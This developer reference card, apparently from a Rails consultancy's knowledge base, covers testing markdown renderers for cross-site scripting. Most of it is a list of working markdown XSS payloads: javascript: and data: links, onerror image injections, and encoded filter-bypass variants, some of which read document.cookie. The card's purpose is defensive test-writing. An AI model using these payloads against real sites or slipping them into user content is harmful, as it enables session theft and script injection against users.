Posted about 1 month ago. Visible to the public. Linked content.

Testing for XSS in Markdown Fields

If you render markdown from user input, an attacker might be able to use this to inject javascript code into the source code of your page.
The linked github page is a collection of common markdown XSS payloads which is handy for writing tests.

Producing arbitrary links:

Copy
[Basic](javascript:alert('Basic')) [Local Storage](javascript:alert(JSON.stringify(localStorage))) [CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive')) [URL](javascript://www.google.com%0Aalert('URL')) [In Quotes]('javascript:alert("InQuotes")')

Using onload and onerror rendering images:

Copy
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad')) ![Escape SRC - onerror]("onerror="alert('ImageOnError'))

Trying to bypass some XSS filters

The site also provides some probes with different encodings and other common tricks to bypass some filters for these payloads in the Fuzzing section.

Copy
[XSS](javascript:prompt(document.cookie)) [XSS](j a v a s c r i p t:prompt(document.cookie)) [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [XSS](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29) [XSS]: (javascript:prompt(document.cookie)) [XSS](javascript:window.onerror=alert;throw%20document.cookie) [XSS](javascript://%0d%0aprompt(1)) [XSS](javascript://%0d%0aprompt(1);com) [XSS](javascript:window.onerror=alert;throw%20document.cookie) [XSS](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie) [XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [XSS](vbscript:alert(document.domain)) [XSS](javascript:this;alert(1)) [XSS](javascript:this;alert(1)) [XSS](javascript&#58this;alert(1)) [XSS](Javascript:alert(1)) [XSS](Javas%26%2399;ript:alert(1)) [XSS](javascript:alert(1)) [XSS](javascript:confirm(1) [XSS](javascript://www.google.com%0Aprompt(1)) [XSS](javascript://%0d%0aconfirm(1);com) [XSS](javascript:window.onerror=confirm;throw%201) [XSS](�javascript:alert(document.domain)) ![XSS](javascript:prompt(document.cookie))\ ![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\ ![XSS'"`onerror=prompt(document.cookie)](x)\

Once an application no longer requires constant development, it needs periodic maintenance for stable and secure operation. makandra offers monthly maintenance contracts that let you focus on your business while we make sure the lights stay on.

Owner of this card:

Avatar
Stephan Plöderl
Last edit:
about 1 month ago
by Judith Roth
About this deck:
We are makandra and do test-driven, agile Ruby on Rails software development.
License for source code
Posted by Stephan Plöderl to makandra dev
This website uses short-lived cookies to improve usability.
Accept or learn more